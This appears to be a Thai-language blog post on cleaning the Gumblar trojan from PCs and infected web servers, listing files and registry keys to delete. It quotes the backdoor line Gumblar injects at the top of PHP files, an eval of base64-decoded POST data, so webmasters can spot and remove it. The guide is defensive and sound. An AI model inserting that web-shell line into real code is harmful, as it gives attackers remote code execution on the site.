..... Wikipedia มีการบันทึกไว้ว่า "Botnet is a jargon term for a collection of software robots, or bots, that run autonomously and automatically. The term is often associated with malicious software but it can also refer to the network of computers using distributed computing software. While botnets are often named after their malicious software name, there are typically multiple botnets in operation using the same malicious software families, but operated by different criminal entities."
..... Gumblar เป็น Trojan ตัวหนึ่งในลักษณะ Botnet อธิบายย่อๆ จาก Wikipedia ได้ว่า Botnet คือ โปรแกรม bot ต่างๆ ทำงานได้อัตโนมัติ และ Malware (โปรแกรมด้านไม่ดีต่างๆ) ต่างๆ ก็เป็นหนึ่งในนั้น และ botnet ก็ยังใช้เรียกระบบเครือข่ายคอมพิวเตอร์ที่ใช้กระจายโปรแกรมต่างๆ เช่นกัน มี botnet ตัวเดียวกันหรือในกลุ่มเดียวกันอยู่มากมาย แต่ควบคุมโดยผู้ควบคุมคนละคนกัน (ถือเป็นกลุ่มอาชญากรรมคอมพิวเตอร์)
สำหรับ Webmaster แล้ว การกำจัด Gumblar ให้หมดต้องกำจัดทั้งฝั่ง Client (เครื่องที่ใช้) และ Server (Web Server ที่ติด)
การกำจัด Gumblar ฝั่ง Client แบบ Manual
..... วิธีนี้ยากเล็กน้อย ต้องมีความรู้ด้านเทคนิคพอสมควร ใช้ต้องเปิด Task Manager แล้วแก้ RegEdit เป็น หากไม่เข้าใจ 2 เรื่องนี้ก็ข้ามไปดู การกำจัด Gumblar แบบง่ายๆ (แต่เสียเงิน)การกำจัด Gumblar ฝั่ง Client แบบ Manual
- หยุด process ของ gumblar.cn จาก Task Manager
- ค้นหาแล้วลบไฟล์ต่อไปนี้
%UserProfile%\Desktop\Viruses.bdt
%UserProfile%\Desktop\Gumblar.lnk
c:\Program Files\Gumblar
c:\Program Files\Gumblar\Viruses.bdt
c:\Program Files\Gumblar\Gumblar.exe
c:\Documents and Settings\All Users\Start Menu\Programs\Gumblar
c:\Documents and Settings\All Users\Start Menu\Programs\Gumblar\Gumblar.lnk
%UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Gumblar.lnk
%UserProfile%\Application Data\Mozilla\Firefox\Profiles\s1jqw0bz.default\cookies.sqlite - ใน RegEdit ลบ Gumblar.cn ใน Registry Values
5222009A-DD62-49c7-A735-7BD18ECC7350
HKEY_CURRENT_USER\Software\Gumblar - เมื่อแก้หมดแล้ว Restart เครื่อง แล้วลองเช็คใหม่อีกครั้งให้แน่ใจ ถ้าทำอย่างไรก็ไม่หาย อาจเป็นได้ว่าอาจเป็น Gumblar ตัวใหม่ ให้ใช้วิธีต่อไป
..... หาก search ในเว็บอาจเจอโปรแกรมที่บอกว่าสามารถกำจัด Gumblar ได้ง่ายๆ ทันที ก็ให้ระวังไว้ด้วยนะครับ ให้ scan ด้วย antivirus ดูก่อน แต่แนะนำว่าถ้าไม่ใช่้เป็นโปรแกรมจากผู้สร้างโปรแกรม Antivirus จริงๆ ที่เชื่อถือได้ ไม่ควรลองเพราะอาจเจอ Virus หรือ Spyware อื่นๆ ติดมาอีกมากมาย อย่างเช่น GumblarFastHeal.exe จะมีแจกในเว็บไซต์ต่างๆ แต่ัตัวนี้มี Spyware ซ่อนอยู่
การกำจัด Gumblar ฝั่ง Client แบบ ง่ายๆ แต่อาจต้องเสียเงิน
..... วิธีนี้ง่ายๆ โดยติดตั้งโปรแกรม Antivirus หรือ AntiSpyware ที่สามารถจัดการ Gumblar ได้ เช่น SpyHunter, SpywareDoctor, NOD ฯลฯ (ถ้าเป็นโปรแกรมอื่นให้ตรวจสอบให้ดีว่าสามารถจัดการ Gumblar ได้)
สำหรับ Webmaster ต้องกำจัดที่ Web Server ด้วย
..... จากบทความก่อนหน้านี้ "เผยความลับ 12 ข้อของ Gumblar" จะเห็นได้ว่า Gumblar เมื่อฝังตัวอยู่ใน .js .html .php มีหน้าอย่างไร ควร Backup ข้อมูลไว้ให้หมดก่อนป้องกันการทำผิดพลาด ในการกำจัดจริงๆ แล้วสามารถทำได้โดยง่ายแค่ลบ code ของ Gumblar ออก แต่ต้องทำอย่างระมัดระวังเป็นอย่างสูง เพราะหากลบ code เกินไปโดน code ของเราเอง หรือลบไม่หมดก็อาจ error ได้ โดยเฉพาะไฟล์ .php สรุปการสังเกตก่อนลบ code Gumblar ดังนี้
- ไฟล์ .php - code Gumblar จะอยู่บนสุด
* ปกติบรรทัดแรกมักจะเป็น if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo ‘36342b3138372e3230312e3232353a7a69636f6c613e70657464726c61ให้ระวังเพราะ Gumblar จะอยู่บรรทัดเดียวกันอยู่กับบรรทัดแรกของ code เรา (ตัวสีแดง)
- ไฟล์ .html - code Gumblar จะอยู่ก่อนแท็ก
- ไฟล์ .js - code Gumblar จะอยู่ล่างสุด
* สำหรับไฟล์ .js ให้ระวังไฟล์ .js อื่นๆ ที่อาจไม่ได้ติด Gumblar แต่หน้าตา่เหมือน Gumblar เพราะมีการ Encode ไฟล์เหมือนกัน ทำให้หน้าตาดูแปลกๆ คล้าย Gumblar เช่น jsquery
..... "การกู้เว็บไซต์คืนจากการถูก block โดย google" .....
0 comments:
Post a Comment